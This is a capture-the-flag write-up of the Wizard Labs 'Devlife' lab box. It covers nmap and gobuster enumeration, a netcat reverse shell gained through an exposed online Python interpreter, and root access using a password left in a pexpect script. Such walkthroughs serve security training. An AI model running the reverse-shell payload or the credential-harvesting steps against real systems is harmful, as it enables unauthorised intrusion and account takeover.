Quick Summary

Hey guys this is my write-up about Devlife from Wizard Labs which is their second box to retire. Just like dummy it’s another easy box (Difficulty : 2/10) , It’s a linux box and its ip is 10.1.1.20 so let’s jump right in !


Nmap

We will start with nmap to scan for open ports and services :

nmap -sV -sT -sC 10.1.1.20

Only 2 ports are open , 22 running ssh and 80 running http. Let’s check http.


HTTP Initial Enumeration

On the main page we get this “About me” message and nothing else :

About Me

Hello , My name is Teddy Smith , I am a Python developer since 2007 !

Here I gonna share some Django tutorials and tutorials about System Administation in Python also I will write a Python online interpreter !!

Stay Tuned ...

TS

I ran gobuster with /usr/share/wordlists/dirb/common.txt and got these results :

/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/.hta (Status: 403)
/dev (Status: 301)
/index.html (Status: 200)
/manual (Status: 301)
/server-status (Status: 403)



Getting user

So I checked /dev and found this Online Python 2.7 Interpreter :

Great , now we can get a reverse shell in many ways , I just imported os then did os.system(reverse shell payload) :

import os;os.system('nc -e /bin/bash 10.xx.xx.xx 1337')

And we owned user !



Stored root Credentials , Privilege Escalation

In the /home directory of tedd there is a directory called .env , Let’s check that.



We notice a python script called su.py , which runs su root and uses the password to authenticate :

import pexpect
child = pexpect.spawn('su root')
child.expect ('Password:')
child.sendline('teddyxy2019')
child.expect('\$')
child.sendline('whoami')

Now we can su to root using the password teddyxy2019 :

And we owned root !



That’s it , Feedback is appreciated !

Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter for awesome resources @Ahm3d_H3sham

Thanks for reading.

Previous Wizard Labs Write-up : Wizard Labs - Dummy